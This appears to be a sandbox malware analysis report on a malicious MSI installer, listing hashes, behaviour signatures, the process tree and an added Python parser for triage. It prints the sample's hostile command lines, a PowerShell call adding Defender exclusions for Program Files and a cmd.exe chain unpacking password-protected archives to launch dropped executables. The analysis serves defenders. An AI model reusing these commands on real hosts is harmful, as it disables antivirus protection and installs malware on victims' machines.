Analysis

max time kernel: 121s
max time network: 123s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 16-11-2024 13:36

Static task: static1
Behavioral task: behavioral1
  Sample: e1fb8b47f237c56c9409de2cd1e04c49a0da76f1b2f62341d97394463f96d323.msi
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: e1fb8b47f237c56c9409de2cd1e04c49a0da76f1b2f62341d97394463f96d323.msi
  Resource: win10v2004-20241007-en

General

Target: e1fb8b47f237c56c9409de2cd1e04c49a0da76f1b2f62341d97394463f96d323.msi
Size: 37.8MB
MD5: 1eb0c7fbfca2f95b76189279eadb9228
SHA1: ef89821dff0b19fb6bac92808f0e42fdd88eb7c7
SHA256: e1fb8b47f237c56c9409de2cd1e04c49a0da76f1b2f62341d97394463f96d323
SHA512: d22f351cbaa2ac225ff9c472c0404098a332bc4de1ca29465d5e6189e3420b2107e7cf6c087dcde0bf05a39668f751484a72386e7055e63be6ba355fea3e4e7e
SSDEEP: 786432:ouZ/E3Y4OJSMSsNuicJ6AEJX9WQnItNe4mzSllmeALf:RMYTJG5EtJnGNe4mzSfn
Malware Config

Signatures

Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
Runs PowerShell to modify Windows Defender settings (the generic signature covers exclusions for file extensions, paths and processes). In this run the command is Add-MpPreference -ExclusionPath for C:\Program Files\UpgradeValiantSupervisor and C:\Program Files (the latter listed twice), launched from the MsiExec.exe custom-action host (PID 2900) before any payload is unpacked, so everything the installer subsequently drops under Program Files is excluded from scanning. On a live host Defender logs each exclusion change as event ID 5007 in its Operational log, and Get-MpPreference shows the resulting ExclusionPath list.
  pid 1188  powershell.exe
Enumerates connected drives (3 TTPs, 46 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
  File opened (read-only) by msiexec.exe: \??\A:, \??\B:, \??\E:, \??\G:, \??\H:, \??\I:, \??\J:, \??\K:, \??\L:, \??\M:, \??\N:, \??\O:, \??\P:, \??\Q:, \??\R:, \??\S:, \??\T:, \??\U:, \??\V:, \??\W:, \??\X:, \??\Y:, \??\Z:
  Every letter except C:, D: and F: appears exactly twice in the 46 entries; both msiexec.exe instances (PIDs 2196 and 2408) carry this signature in the process tree. Probing every drive letter is normal Windows Installer disk-costing behaviour, so on its own this signature says little about the package.
Drops file in System32 directory (1 IoC)
  File opened for modification  C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe
  The literal, unexpanded %ProgramData% makes this a relative path, resolved against the process's working directory (System32 here). The file is PowerShell's own Start Menu shortcut; no payload is written to System32.
Drops file in Program Files directory (19 IoCs)
All under C:\Program Files\UpgradeValiantSupervisor\:
  FRHCPRDSCKpKTwMdXJauvGnbrrBSLW            created (msiexec.exe)
  jJdRJSuAKBvtXRTgfinkngKoulBasD            created, opened for modification (NExERxptCnfNovdPQUVKIftjqvLPvD.exe)
  NExERxptCnfNovdPQUVKIftjqvLPvD.exe        created (msiexec.exe)
  MOELauncherSetup_V0TKW.exe                created (msiexec.exe)
  WhatsApp1.exe                             created (msiexec.exe)
  ZhObbZwOavDN.exe                          created, opened for modification (MsiExec.exe)
  ZhObbZwOavDN                              created, opened for modification (NExERxptCnfNovdPQUVKIftjqvLPvD.exe)
  2_ZhObbZwOavDN.exe                        created, opened for modification (NExERxptCnfNovdPQUVKIftjqvLPvD.exe)
  ZhObbZwOavDN.vbs                          created (ZhObbZwOavDN.exe)
  QtrVrzdIjlZB.exe                          created, opened for modification (NExERxptCnfNovdPQUVKIftjqvLPvD.exe)
  QtrVrzdIjlZB.xml                          created, opened for modification (NExERxptCnfNovdPQUVKIftjqvLPvD.exe)
  VAEeuoHuQuOLljROMdYRVrWysOrkCm            created, opened for modification (NExERxptCnfNovdPQUVKIftjqvLPvD.exe)
Drops file in Windows directory (10 IoCs)
  C:\Windows\INF\setupapi.ev1, setupapi.ev3, setupapi.dev.log   opened for modification (DrvInst.exe)
  C:\Windows\Installer\                                         opened for modification (msiexec.exe)
  C:\Windows\Installer\MSI213.tmp                               opened for modification (msiexec.exe)
  C:\Windows\Installer\f770139.msi                              created, opened for modification (msiexec.exe)
  C:\Windows\Installer\f77013a.ipi                              created, opened for modification (msiexec.exe)
  C:\Windows\Installer\f77013c.msi                              created (msiexec.exe)
Executes dropped EXE (4 IoCs)
  pid 2044  NExERxptCnfNovdPQUVKIftjqvLPvD.exe
  pid 592   NExERxptCnfNovdPQUVKIftjqvLPvD.exe
  pid 2960  ZhObbZwOavDN.exe
  pid 2404  WhatsApp1.exe

Event Triggered Execution: Installer Packages (2 TTPs, 1 IoC)
  pid 2196  msiexec.exe

System Location Discovery: System Language Discovery (1 TTP, 3 IoCs)
Attempts to gather information about the system language of the victim in order to infer the geographical location of the host.
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  NExERxptCnfNovdPQUVKIftjqvLPvD.exe (twice; PIDs 2044 and 592 both carry the signature)
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  ZhObbZwOavDN.exe

System Network Configuration Discovery: Internet Connection Discovery (1 TTP, 2 IoCs)
Adversaries may check for Internet connectivity on compromised systems.
  pid 1548  cmd.exe
  pid 1244  PING.EXE
  The target here is 127.0.0.1 with -n 2, run between the two archive extractions: the classic cmd.exe one-second sleep, not a connectivity check.
Modifies data under HKEY_USERS (48 IoCs)
  DrvInst.exe, key created (42 keys, all under \REGISTRY\USER\.DEFAULT\):
    Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
    Software\Microsoft\SystemCertificates\{Root, CA, Disallowed, TrustedPeople, trust, SmartCardRoot}, each with its Certificates, CRLs and CTLs subkeys (24 keys)
    Software\Microsoft\SystemCertificates\My
    Software\Policies\Microsoft\SystemCertificates\{CA, Disallowed, TrustedPeople, trust}, each with its Certificates, CRLs and CTLs subkeys (16 keys)
  DrvInst.exe, set value (data): \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 (UTF-16LE "en-US", "en")
  powershell.exe: key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage; set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b08a919c2c38db01
  msiexec.exe: key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E; key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D and \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E
  The certificate-store keys are the empty per-profile store skeleton CryptoAPI creates when DrvInst.exe (running under .DEFAULT) verifies driver signatures for the snapshot volume; they are a side effect of the install, not something the dropped binaries write.
Modifies registry class (22 IoCs)
All by msiexec.exe, under \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\:
  Products\DFF86025C7A5F5543BC7555DD9EB9568: key created; Language = "1033" (int); Version = "84410373" (int; 0x05080005, i.e. ProductVersion 5.8.5); Clients = 3a0000000000 (data); AuthorizedLUAApp = "0"; DeploymentFlags = "3"; InstanceType = "0"; Assignment = "1"; AdvertiseFlags = "388"; ProductName = "UpgradeValiantSupervisor"; PackageCode = "034EDA160E21BFF4487E3C8D30FD36D5"
  Products\DFF86025C7A5F5543BC7555DD9EB9568\SourceList: key created; PackageName = "e1fb8b47f237c56c9409de2cd1e04c49a0da76f1b2f62341d97394463f96d323.msi"; LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\"
  Products\DFF86025C7A5F5543BC7555DD9EB9568\SourceList\Media: key created; Media\1 = ";"
  Products\DFF86025C7A5F5543BC7555DD9EB9568\SourceList\Net: key created; Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\"
  Features\DFF86025C7A5F5543BC7555DD9EB9568: key created; ProductFeature set (str)
  UpgradeCodes\F40D3C9F0B2AFBA4AAD1FA0B9B8BA863: key created; value DFF86025C7A5F5543BC7555DD9EB9568 set (str)
The key names are Windows Installer packed GUIDs (the hex digits of each GUID field reversed). DFF86025C7A5F5543BC7555DD9EB9568 unpacks to the product code {52068FFD-5A7C-455F-B37C-55D59DBE5986}, which is the identifier an installed copy normally registers under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall and the one to hunt for on other hosts.
Runs ping.exe (1 TTP, 1 IoC)
  pid 1244  PING.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam (2 IoCs)
  pid 2044  NExERxptCnfNovdPQUVKIftjqvLPvD.exe
  pid 592   NExERxptCnfNovdPQUVKIftjqvLPvD.exe

Suspicious behavior: EnumeratesProcesses (53 IoCs)
  2408 msiexec.exe (2), 1188 powershell.exe (1), 2960 ZhObbZwOavDN.exe (50)

Suspicious use of AdjustPrivilegeToken (64 IoCs)
  2196 msiexec.exe (31): SeShutdownPrivilege x2, SeIncreaseQuotaPrivilege x2, SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
  2408 msiexec.exe (11): SeRestorePrivilege x5, SeTakeOwnershipPrivilege x4, SeSecurityPrivilege, SeBackupPrivilege
  2788 vssvc.exe (3): SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
  2832 DrvInst.exe (10): SeRestorePrivilege x7, SeLoadDriverPrivilege x3
  1188 powershell.exe (1): SeDebugPrivilege
  2044 NExERxptCnfNovdPQUVKIftjqvLPvD.exe (4): SeRestorePrivilege, privilege 35, SeSecurityPrivilege x2
  592 NExERxptCnfNovdPQUVKIftjqvLPvD.exe (4): SeRestorePrivilege, privilege 35, SeSecurityPrivilege x2
  The sandbox leaves privilege 35 unnamed; LUID 35 is SeCreateSymbolicLinkPrivilege in winnt.h. SeRestore plus symbolic-link plus SeSecurity is the set an archiver enables to restore links and security descriptors while extracting, which fits the `x ... -o ... -p ...` command lines these two processes run.

Suspicious use of FindShellTrayWindow (2 IoCs)
  pid 2196  msiexec.exe (x2)

Suspicious use of WriteProcessMemory (32 IoCs)
  2408 msiexec.exe -> 2900 MsiExec.exe (x5, target index 35)
  2900 MsiExec.exe -> 1188 powershell.exe (x3, 37); 1548 cmd.exe (x3, 39); 2960 ZhObbZwOavDN.exe (x4, 46); 2404 WhatsApp1.exe (x3, 48)
  1548 cmd.exe -> 2044 NExERxptCnfNovdPQUVKIftjqvLPvD.exe (x4, 41); 1244 PING.EXE (x3, 42); 592 NExERxptCnfNovdPQUVKIftjqvLPvD.exe (x4, 44)
  2404 WhatsApp1.exe -> 2508 WerFault.exe (x3, 49)
  Every edge here is a parent writing into a child it has just created, matching the process tree below; there is no write into an unrelated process that would indicate injection.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots. Here it is the vssvc.exe (PID 2788) and DrvInst.exe (PID 2832, installing STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19) activity that accompanies the restore point Windows Installer creates on Windows 7 before an install; none of the dropped binaries call VSS themselves, so this is not shadow-copy deletion.
Processes

C:\Windows\system32\msiexec.exe  (PID 2196)
    cmdline: msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\e1fb8b47f237c56c9409de2cd1e04c49a0da76f1b2f62341d97394463f96d323.msi
    - Enumerates connected drives
    - Event Triggered Execution: Installer Packages
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow

C:\Windows\system32\msiexec.exe  (PID 2408; the Windows Installer service instance)
    cmdline: C:\Windows\system32\msiexec.exe /V
    - Enumerates connected drives
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\MsiExec.exe  (PID 2900; the custom-action server, so everything below runs from the package's custom actions)
        cmdline: C:\Windows\system32\MsiExec.exe -Embedding 15D0C9DC1847F322A412425671DC0E89 M Global\MSI0000
        - Drops file in Program Files directory
        - Suspicious use of WriteProcessMemory

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1188)
            cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\UpgradeValiantSupervisor','C:\Program Files','C:\Program Files'
            - Command and Scripting Interpreter: PowerShell
            - Drops file in System32 directory
            - Modifies data under HKEY_USERS
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

        C:\Windows\System32\cmd.exe  (PID 1548)
            cmdline: "C:\Windows\System32\cmd.exe" /c start /min "" "C:\Program Files\UpgradeValiantSupervisor\NExERxptCnfNovdPQUVKIftjqvLPvD.exe" x "C:\Program Files\UpgradeValiantSupervisor\FRHCPRDSCKpKTwMdXJauvGnbrrBSLW" -o"C:\Program Files\UpgradeValiantSupervisor\" -p"44087mU[5d*Fa.9tO{bb" -y & ping 127.0.0.1 -n 2 & start /min "" "C:\Program Files\UpgradeValiantSupervisor\NExERxptCnfNovdPQUVKIftjqvLPvD.exe" x "C:\Program Files\UpgradeValiantSupervisor\jJdRJSuAKBvtXRTgfinkngKoulBasD" -x!1_ZhObbZwOavDN.exe -x!sss -x!1_YeIgTCQVJGErbtEGGiDlTxgCffkbDZ.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\UpgradeValiantSupervisor\" -p"04434k+1^Z$HJ^mp6+xz" -y
            - System Network Configuration Discovery: Internet Connection Discovery
            - Suspicious use of WriteProcessMemory
            The chain unpacks two password-protected archives (FRHC... and jJdR...) into the directory the preceding PowerShell command excluded from Defender, with a one-second loopback ping between them. The switch syntax (x, -o, -p, -x!, -y) is 7-Zip's; the report does not establish what the renamed extractor binary actually is.

            C:\Program Files\UpgradeValiantSupervisor\NExERxptCnfNovdPQUVKIftjqvLPvD.exe  (PID 2044)
                cmdline: "C:\Program Files\UpgradeValiantSupervisor\NExERxptCnfNovdPQUVKIftjqvLPvD.exe" x "C:\Program Files\UpgradeValiantSupervisor\FRHCPRDSCKpKTwMdXJauvGnbrrBSLW" -o"C:\Program Files\UpgradeValiantSupervisor\" -p"44087mU[5d*Fa.9tO{bb" -y
                - Drops file in Program Files directory
                - Executes dropped EXE
                - System Location Discovery: System Language Discovery
                - Suspicious behavior: CmdExeWriteProcessMemorySpam
                - Suspicious use of AdjustPrivilegeToken

            C:\Windows\system32\PING.EXE  (PID 1244)
                cmdline: ping 127.0.0.1 -n 2
                - System Network Configuration Discovery: Internet Connection Discovery
                - Runs ping.exe

            C:\Program Files\UpgradeValiantSupervisor\NExERxptCnfNovdPQUVKIftjqvLPvD.exe  (PID 592)
                cmdline: "C:\Program Files\UpgradeValiantSupervisor\NExERxptCnfNovdPQUVKIftjqvLPvD.exe" x "C:\Program Files\UpgradeValiantSupervisor\jJdRJSuAKBvtXRTgfinkngKoulBasD" -x!1_ZhObbZwOavDN.exe -x!sss -x!1_YeIgTCQVJGErbtEGGiDlTxgCffkbDZ.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\UpgradeValiantSupervisor\" -p"04434k+1^Z$HJ^mp6+xz" -y
                - Drops file in Program Files directory
                - Executes dropped EXE
                - System Location Discovery: System Language Discovery
                - Suspicious behavior: CmdExeWriteProcessMemorySpam
                - Suspicious use of AdjustPrivilegeToken

        C:\Program Files\UpgradeValiantSupervisor\ZhObbZwOavDN.exe  (PID 2960)
            cmdline: "C:\Program Files\UpgradeValiantSupervisor\ZhObbZwOavDN.exe" -number 110 -file file3 -mode mode3
            - Drops file in Program Files directory
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses

        C:\Program Files\UpgradeValiantSupervisor\WhatsApp1.exe  (PID 2404)
            cmdline: "C:\Program Files\UpgradeValiantSupervisor\WhatsApp1.exe"
            - Executes dropped EXE
            - Suspicious use of WriteProcessMemory

            C:\Windows\system32\WerFault.exe  (PID 2508)
                cmdline: C:\Windows\system32\WerFault.exe -u -p 2404 -s 632
                WerFault.exe with -p 2404 is Windows Error Reporting handling a crash of WhatsApp1.exe, so the final dropped binary faulted on this Windows 7 image and its intended behaviour is not visible here; compare the behavioral2 task on win10v2004-20241007-en.

C:\Windows\system32\vssvc.exe  (PID 2788)
    cmdline: C:\Windows\system32\vssvc.exe
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\DrvInst.exe  (PID 2832)
    cmdline: DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000002C4" "0000000000000594"
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
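The two command lines in this tree that matter most for triage are the Add-MpPreference call (PID 1188) and the cmd.exe chain (PID 1548) that unpacks two password-protected archives into the directory the exclusion just covered. The following Python is an added example and not part of the sandbox report or the sample: it parses both command lines, copied verbatim from the process tree above, recovers the exclusion paths, the archive paths, passwords and exclude masks, and checks whether a dropped file falls under an exclusion. It assumes cmd.exe quoting (double quotes only, no backslash escapes) and reads the x / -o / -p / -x! / -y switches as 7-Zip syntax; whether the renamed binary NExERxptCnfNovdPQUVKIftjqvLPvD.exe is actually a 7-Zip build is not established by the report, and the Finding class and function names are this example's own.

```python
import re
from dataclasses import dataclass, field

# Both command lines are copied verbatim from the process tree above (PIDs 1188 and 1548).
PS_CMDLINE = r"""
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\UpgradeValiantSupervisor','C:\Program Files','C:\Program Files'
""".strip()

CMD_CMDLINE = (
    r'"C:\Windows\System32\cmd.exe" /c start /min "" '
    r'"C:\Program Files\UpgradeValiantSupervisor\NExERxptCnfNovdPQUVKIftjqvLPvD.exe" x '
    r'"C:\Program Files\UpgradeValiantSupervisor\FRHCPRDSCKpKTwMdXJauvGnbrrBSLW" '
    r'-o"C:\Program Files\UpgradeValiantSupervisor\" -p"44087mU[5d*Fa.9tO{bb" -y '
    r'& ping 127.0.0.1 -n 2 & start /min "" '
    r'"C:\Program Files\UpgradeValiantSupervisor\NExERxptCnfNovdPQUVKIftjqvLPvD.exe" x '
    r'"C:\Program Files\UpgradeValiantSupervisor\jJdRJSuAKBvtXRTgfinkngKoulBasD" '
    r'-x!1_ZhObbZwOavDN.exe -x!sss -x!1_YeIgTCQVJGErbtEGGiDlTxgCffkbDZ.exe -x!1_ -x!1_ -x!sa '
    r'-o"C:\Program Files\UpgradeValiantSupervisor\" -p"04434k+1^Z$HJ^mp6+xz" -y'
)

# Add-MpPreference exclusion switches and their comma-separated argument lists.
EXCLUSION_RE = re.compile(r"-Exclusion(Path|Extension|Process)\s+(.+?)(?=\s+-[A-Za-z]|$)", re.I)


@dataclass
class Finding:
    kind: str  # "defender_exclusion", "archive_extract" or "ping_delay"
    details: dict = field(default_factory=dict)


def split_outside_quotes(line, is_sep):
    """Split on characters satisfying is_sep, never inside double quotes (cmd.exe has no
    backslash escape, so every quote toggles state). Empty pieces are dropped."""
    parts, cur, in_quotes = [], [], False
    for ch in line:
        if ch == '"':
            in_quotes = not in_quotes
        if is_sep(ch) and not in_quotes:
            if cur:
                parts.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        parts.append("".join(cur))
    return parts


def strip_launchers(toks):
    """Peel off a leading `cmd.exe /c` and `start [/switches] ""` so the real program is toks[0]."""
    if toks and toks[0].lower().endswith("cmd.exe"):
        toks = toks[2:] if len(toks) > 1 and toks[1].lower() in ("/c", "/k") else toks[1:]
    if toks and toks[0].lower() == "start":
        toks = toks[1:]
        while toks and (toks[0].startswith("/") or toks[0] == ""):  # /min etc. and the empty window title
            toks = toks[1:]
    return toks


def triage(cmdline):
    """Return the Findings for one process command line."""
    findings = []
    if re.search(r"\bAdd-MpPreference\b", cmdline, re.I):
        for m in EXCLUSION_RE.finditer(cmdline):
            items = [x.strip().strip("'\"") for x in m.group(2).split(",") if x.strip()]
            findings.append(Finding("defender_exclusion", {"type": m.group(1).lower(), "items": items}))
    # `&` chains several commands inside one cmd.exe invocation; inspect each separately.
    for part in split_outside_quotes(cmdline, lambda c: c == "&"):
        toks = strip_launchers([t.replace('"', "") for t in split_outside_quotes(part, str.isspace)])
        if not toks:
            continue
        exe = toks[0].rsplit("\\", 1)[-1].lower()
        if exe in ("ping", "ping.exe") and "-n" in toks:
            # `ping <host> -n N` is the classic cmd.exe sleep (about N-1 seconds against loopback).
            n = toks.index("-n")
            host = [t for k, t in enumerate(toks[1:], 1) if k not in (n, n + 1)]
            findings.append(Finding("ping_delay", {"target": host[0] if host else "", "count": int(toks[n + 1])}))
        elif len(toks) >= 3 and toks[1].lower() == "x":
            # 7-Zip extract syntax (assumed): x <archive> -o<dir> -p<password> -x!<mask> -y
            d = {"process": toks[0], "archive": toks[2], "outdir": None, "password": None, "excludes": [], "assume_yes": False}
            for t in toks[3:]:
                if t.startswith("-o"):
                    d["outdir"] = t[2:]
                elif t.startswith("-p"):
                    d["password"] = t[2:]
                elif t.startswith("-x!"):
                    d["excludes"].append(t[3:])
                elif t == "-y":
                    d["assume_yes"] = True
            findings.append(Finding("archive_extract", d))
    return findings


def exclusion_covers(findings, path):
    """True when `path` lies under any Defender path exclusion in `findings` (case-insensitive prefix)."""
    p = path.lower().rstrip("\\")
    for f in findings:
        if f.kind == "defender_exclusion" and f.details["type"] == "path":
            for ex in f.details["items"]:
                e = ex.lower().rstrip("\\")
                if p == e or p.startswith(e + "\\"):
                    return True
    return False


if __name__ == "__main__":
    for line in (PS_CMDLINE, CMD_CMDLINE):
        for f in triage(line):
            print(f.kind, f.details)
```

Run stand-alone it prints the three findings from the cmd.exe chain and the one exclusion finding from PowerShell. The recovered passwords let an analyst open FRHCPRDSCKpKTwMdXJauvGnbrrBSLW and jJdRJSuAKBvtXRTgfinkngKoulBasD in the lab without executing the dropper, and exclusion_covers shows that every file later dropped under C:\Program Files\UpgradeValiantSupervisor, including WhatsApp1.exe, was already excluded from Defender scanning when it landed.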
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 7KB
MD5: a5dda40cac4aec2b9eb1d60f1d121b70
SHA1: e54d7bba93efc5dcf1eb007309f30a1af4319e4a
SHA256: 4580d3b5ce1e75d568ab8b5607fba49a4323e68665db4711d0a6be145a7a3148
SHA512: a977474d01cb256e90dd15baf22ce99fde3fa67ee318543774c7e84f5a6a21d6a7cc5a36b37a2e2fd5e0154aa38499c32e983424736ee6185b51cc301bf05318

Filesize: 2.1MB
MD5: 124b1390f39511fa043e99578d4fad57
SHA1: 9f2e13afe318878167328104b6710ad53f1f168b
SHA256: f65559e20b9473aa23450850ac2a0a6d6045a8987236db6ff9b2b3e448e569e9
SHA512: eb0d19da7f3e775ca6e36f0c51f7a83116a16b6096dd0c5e42ef23a4cdcf2cea805e928092c2adc6c78138455b2b2fb7f62dfe287ead2fb3ee7dd0e86f16c9ac

Filesize: 1.5MB
MD5: 3833fb3821f72c1ed7afd41df3e485c5
SHA1: 5a2224f9c26e4d9e1e406ecc8a18c2dfb4400ba2
SHA256: d4dd1cf01cc90001906f73290d3e2ddbb3c29f3d6fba25b68e07498d8072fe7f
SHA512: 8ec522441c166d4a04604a44b617f8848c6f203c8975702b242180dadc6a7bf5c8e1e0c6f4f742d29058baaeb499d0b64eca0fb90762b7f0224b9c19da7ed19a

Filesize: 577KB
MD5: c31c4b04558396c6fabab64dcf366534
SHA1: fa836d92edc577d6a17ded47641ba1938589b09a
SHA256: 9d182f421381429fd77598feb609fefb54dcaef722ddbf5aa611b68a706c10d3
SHA512: 814dcbc1d43bc037dadc2f3f67856dd790b15fc1b0c50fa74a169c8cc02cdc79d44f1f10e200ef662eee20cd6b5ca646ec4e77673e3fe3cb7dfb7649243f6e99

Filesize: 1.0MB
MD5: f90ddf18d65bb3153bcdfdc4856ce2a5
SHA1: 611376391f17207d60ca8c2ec81354933f8dac45
SHA256: 62eef5a5e363624007bc29a6ecd3275aec2e5a67eef058df404d145c90e3a0ce
SHA512: f3f20f216ab6fd055f8d494f2758512413cb1cf121a2b51cae4e7b371a595b4dfe8ed4213aa759ccc4569ad6ed792f936304bfb4aac2952a79a3b2bccd293316

Filesize: 1.5MB
MD5: 7dae674c54e91c0389acc2bba94104fa
SHA1: 3104b569de1d4086bc9a691e0c99399920ee6475
SHA256: 605d7822ebc5196145cd4a01510b85dcac29fdfff6c48cab892f3dd10c749a9b
SHA512: 6e896a29b736c09fbe7abe6e21653f4c9f2e6c26ee4790d371b45935bc075ee865534b9dabf78c2fb2432de2ae6087d4277cf6297fd0eb6e1474ff6d92a0616f

Filesize: 37.8MB (the submitted sample itself; hashes match the General section)
MD5: 1eb0c7fbfca2f95b76189279eadb9228
SHA1: ef89821dff0b19fb6bac92808f0e42fdd88eb7c7
SHA256: e1fb8b47f237c56c9409de2cd1e04c49a0da76f1b2f62341d97394463f96d323
SHA512: d22f351cbaa2ac225ff9c472c0404098a332bc4de1ca29465d5e6189e3420b2107e7cf6c087dcde0bf05a39668f751484a72386e7055e63be6ba355fea3e4e7e